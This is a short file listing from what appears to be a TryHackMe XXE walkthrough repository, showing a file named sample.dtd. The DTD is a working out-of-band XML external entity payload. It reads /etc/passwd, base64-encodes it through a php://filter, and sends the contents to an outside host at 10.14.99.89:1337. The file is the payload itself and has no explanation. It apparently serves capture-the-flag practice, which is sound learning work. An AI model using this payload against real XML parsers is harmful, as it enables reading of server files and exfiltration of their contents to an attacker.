Files
TryHackMe/Walkthroughs/XXE/sample.dtd
2025-12-04 09:57:17 +01:00

4 lines
172 B
DTD

<!ENTITY % cmd SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % oobxxe "<!ENTITY exfil SYSTEM 'http://10.14.99.89:1337/?data=%cmd;'>">
%oobxxe;